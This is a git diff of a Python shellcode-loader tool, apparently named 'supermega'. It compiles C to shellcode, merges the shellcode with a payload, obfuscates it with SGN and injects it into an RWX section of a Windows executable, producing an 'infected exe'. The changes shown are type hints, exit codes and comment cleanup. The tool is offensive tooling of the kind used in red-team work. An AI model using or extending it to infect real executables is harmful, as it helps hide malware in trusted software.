diff --git a/pehelper.py b/pehelper.py index 3819415..aded9a7 100644 --- a/pehelper.py +++ b/pehelper.py @@ -32,7 +32,7 @@ def write_code_section(exe_file: FilePath, new_data: bytes): f.write(new_data) -def get_code_section(pe) -> pefile.SectionStructure: +def get_code_section(pe: pefile.PE) -> pefile.SectionStructure: entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint for sect in pe.sections: if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: @@ -106,7 +106,7 @@ def extract_iat(pe: pefile.PE): return iat -def get_addr_for(iat, func_name): +def get_addr_for(iat, func_name: str) -> int: for dll_name in iat: for entry in iat[dll_name]: if entry["func_name"] == func_name: diff --git a/phases/injector.py b/phases/injector.py index 6a056d1..896ddf6 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -56,8 +56,8 @@ def inject_exe( # write back our patched code into the exe write_code_section(exe_file=exe_out, new_data=code) - -def verify_injected_exe(exefile: FilePath): + +def verify_injected_exe(exefile: FilePath) -> int: logger.info("---[ Verify infected exe: {} ".format(exefile)) # remove indicator file pathlib.Path(project.verify_filename).unlink(missing_ok=True) @@ -70,8 +70,8 @@ def verify_injected_exe(exefile: FilePath): logger.info("---> Verify OK. Infected exe works (file was created)") # better to remove it immediately os.remove(project.verify_filename) - return True + return 0 else: logger.error("---> Verify FAIL. Infected exe does not work (no file created)") - return False + return 1 diff --git a/project.py b/project.py index 095e8e9..eee05ef 100644 --- a/project.py +++ b/project.py @@ -1,6 +1,7 @@ from model import * from defs import * + class Project(): def __init__(self): # User, generating normally @@ -32,7 +33,7 @@ class Project(): self.generate_asm_from_c: bool = True self.generate_shc_from_asm: bool = True - self.verify_filename = r'C:\Temp\a' + self.verify_filename: FilePath = r'C:\Temp\a' project = Project() diff --git a/supermega.py b/supermega.py index 36bad6f..e3f28f3 100644 --- a/supermega.py +++ b/supermega.py @@ -151,10 +151,6 @@ def start(): else: logger.info("--[ Some imports are missing for the shellcode to use IAT_REUSE") project.source_style = SourceStyle.peb_walk - - #observer.add_json("capabilities_a", project.exe_capabilities) - #observer.add_json("options", options) - logger.warning("--[ SourceStyle: {}".format(project.source_style.name)) # Copy: loader C files into working directory: build/ @@ -165,7 +161,7 @@ def start(): decoder_style= project.decoder_style, ) - # Convert: C -> ASM + # Compile: C -> ASM if project.generate_asm_from_c: # Find payload size with open(project.payload, 'rb') as input2: @@ -177,18 +173,18 @@ def start(): payload_len = payload_length, exe_capabilities = project.exe_capabilities) - # Convert: ASM -> Shellcode + # Assemble: ASM -> Shellcode if project.generate_shc_from_asm: phases.assembler.asm_to_shellcode( asm_in = main_asm_file, build_exe = main_exe_file, shellcode_out = main_shc_file) - # Try: Starting the shellcode (rarely useful) + # Try: Starting the loader-shellcode (rarely useful) if project.try_start_loader_shellcode: try_start_shellcode(main_shc_file) - # Merge shellcode/loader with payload + # Merge: shellcode/loader with payload if project.dataref_style == DataRefStyle.APPEND: phases.assembler.merge_loader_payload( shellcode_in = main_shc_file, @@ -209,26 +205,18 @@ def start(): # copy it to out shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file))) - # SGN - # after we packed everything (so jmp to end of code still works) - #if options["obfuscate_shc_loader"] and project.exe_capabilities.rwx_section != None: + # RWX Injection if project.exe_capabilities.rwx_section != None: logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format( project.exe_capabilities.rwx_section.Name.decode().rstrip('\x00') )) obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn") - observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn")) shutil.move(main_shc_file + ".sgn", main_shc_file) - - #if options["verify"]: - # if not verify_shellcode("main-clean.bin"): - # return # inject merged loader into an exe + exit_code = 0 if project.inject: - #debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"]) - phases.injector.inject_exe( shellcode_in = main_shc_file, exe_in = project.inject_exe_in, @@ -236,26 +224,21 @@ def start(): exe_capabilities = project.exe_capabilities ) if project.verify: - logger.info("--[ Verify final exe") - if phases.injector.verify_injected_exe(project.inject_exe_out): - #debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"]) - pass + logger.info("--[ Verify infected exe") + exit_code = phases.injector.verify_injected_exe(project.inject_exe_out) - if project.try_start_final_infected_exe: + elif project.try_start_final_infected_exe: logger.info("--[ Start infected exe") run_process_checkret([ project.inject_exe_out, ], check=False) - # dump the info i gathered - #file = open('latest.pickle', 'wb') - #pickle.dump(data, file) - #file.close() - - # delete files + # Cleanup files if project.cleanup_files_on_exit: clean_files() + exit(exit_code) + def obfuscate_shc_loader(file_shc_in, file_shc_out): logger.info("--[ Obfuscate shellcode with SGN")